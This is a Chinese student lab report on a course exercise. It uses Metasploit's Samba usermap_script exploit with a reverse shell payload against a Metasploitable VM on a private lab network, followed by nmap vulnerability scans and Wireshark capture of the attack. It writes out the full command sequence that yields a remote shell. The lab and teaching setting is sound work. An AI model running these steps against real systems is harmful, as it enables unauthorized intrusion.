一、实践内容:
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
二、实践过程
1、使用Metasploit进行Linux远程渗透攻击
Kali-Linux攻击机 192.168.200.4
Metasploitable_ubuntu靶机 192.168.200.5
首先对攻击机和靶机进行互ping,检查连通性
在Kali攻击机中使用msfconsole命令打开Metasploit工具
本次实验选择了exploit:exploit/multi/samba/usermap_script渗透攻击模块,因此先使用search usermap_script命令对该模块进行查找。
根据提示,输入use 0 启动该攻击模块
打开攻击模块后,使用show payloads命令先查看攻击载荷
使用show options命令选择反弹攻击载荷
使用show options代码查看需要配置的参数
根据show options,进行对应参数的设置,并重新show options进行检查,代码如下:
set LHOST 192.168.200.4
set RHOST 192.168.200.5
show options
输入攻击命令进行攻击,可以发现攻击成功
2、实践作业:攻防对抗实践
由我和袁思成完成这部分攻防实验。
①攻击实验Kali-Linux攻击机(祝浩宣) 172.20.10.11
Metasploitable_ubuntu靶机(袁思承) 172.20.10.13
首先,仍然是检验二者之间的连通性
使用sudo nmap -sV 172.20.10.13命令进行目标主机(靶机)的漏洞扫描
使用sudo nmap --script vuln 172.20.10.13命令进行目标主机存在漏洞的扫描,发现多个漏洞,例如CVE编号为2014-0224、2014-3566的漏洞等等
攻击与上述实验一致,进行如下:
msfconsole
use exploit/multi/samba/usermap_script
show payloads
set payload cmd/unix/reverse
set LHOST 172.20.10.11
set RHOST 172.20.10.13
show options
exploit
攻击成功如下:
②防御实验
防御实验只需要在wireshark中进行监听即可,因此较为简单。可以输入以下代码进行数据包的筛选,结果如下:
ip.addr == 172.20.10.11 && ip.addr == 172.20.10.13
跟踪TCP流
三、学习中遇到的问题及解决
无
四、学习感想和体会
在实验中会遇到一些不理解的步骤,解决后会觉得获益匪浅。从之前理解不是很到位的端口和网段,每一次亲自试错解决都会感觉收获很大。
通过本次使用Metasploit进行Linux远程渗透攻击,首先进一步熟悉了Metasploit工具的使用,其次通过攻防对抗过程,动手进行了从漏洞信息搜集、漏洞利用、渗透攻击到获取目标主机权限的过程,提高了自己的实践能力。
946
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
